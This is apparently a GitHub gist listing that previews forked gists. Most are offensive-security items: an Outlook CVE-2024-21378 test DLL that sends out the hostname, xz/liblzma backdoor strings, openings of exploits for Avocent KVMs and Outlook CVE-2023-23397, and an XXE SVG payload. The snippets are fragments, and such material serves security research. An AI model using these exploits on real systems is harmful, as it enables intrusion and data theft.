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infernalheaven / test_dll.c
Created April 13, 2024 04:48 — forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: (com-forms branch).
* After being loaded into MS Outlook, it sends the PC's hostname and
infernalheaven / hashes.txt
Created April 3, 2024 13:16 — forked from q3k/hashes.txt
liblzma backdoor strings extracted from 5.6.1 (from a built-in trie)
0810 b' from '
0678 b' ssh2'
00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
0708 b'%s'
0108 b'/usr/sbin/sshd\x00'
0870 b'Accepted password for '
01a0 b'Accepted publickey for '
0c40 b'BN_bin2bn\x00'
06d0 b'BN_bn2bin\x00'
0958 b'BN_dup\x00'
infernalheaven /
Created March 29, 2024 22:02 — forked from thesamesam/
xz-utils backdoor situation

FAQ on the xz-utils backdoor


On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for

infernalheaven / OpenSSL cheat sheet for socket
Created January 9, 2024 16:29 — forked from azadkuh/OpenSSL cheat sheet for socket
OpenSSL cheat sheet. This is a brief howto for socket programmers.

#OpenSSL cheat sheet This is a brief howto for socket programmers.

create RSA key pairs

ex: 1024bits length key pair:

$> openssl genrsa -out myprivate.pem 1024
$> openssl rsa -in myprivate.pem -pubout -out mypublic.pem
infernalheaven /
Created December 30, 2023 15:08 — forked from aemmitt-ns/
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
global socks # python closes out of scope sockets
port = 3211 # port is hardcoded in the binary
usernm = username.encode()
#!/usr/bin/env python
import sys
import time
import getopt
import socket
Gives the hexadecimal representation of "command"
infernalheaven / host_getter.svg
Created April 17, 2023 12:44 — forked from jakekarnes42/host_getter.svg
An SVG "image" that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
infernalheaven /
Created April 2, 2023 16:23 — forked from SeanPesce/
Linux shell command to find binaries that contain a specific symbol. Useful when searching for command injection and other vulnerabilities.
SYMBOL_NAME="system"; find ./ -type f -exec printf "{}: " \; -exec sh -c "objdump -T \"{}\" 2>&1 | grep -e \" $SYMBOL_NAME\" ; echo \"\"" \; | grep -e " $SYMBOL_NAME"
infernalheaven /
Created March 28, 2023 09:41 — forked from tothi/
Exploiting Outlook CVE-2023-23397 using Python by sending the message through EWS
#!/usr/bin/python -u
from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
import urllib3
infernalheaven / gist:2243996a3f9b2924ea93424efb3cadd2
Created February 3, 2023 23:47 — forked from rygorous/gist:e0f055bfb74e3d5f0af20690759de5a7
A bit of background on compilers exploiting signed overflow
Why do compilers even bother with exploiting undefinedness signed overflow? And what are those
mysterious cases where it helps?
A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but
I think it's useful to know what compiler writers are accomplishing by this.
TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all
major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some
fairly common cases. The signed overflow UB exploitation is an attempt to work around this.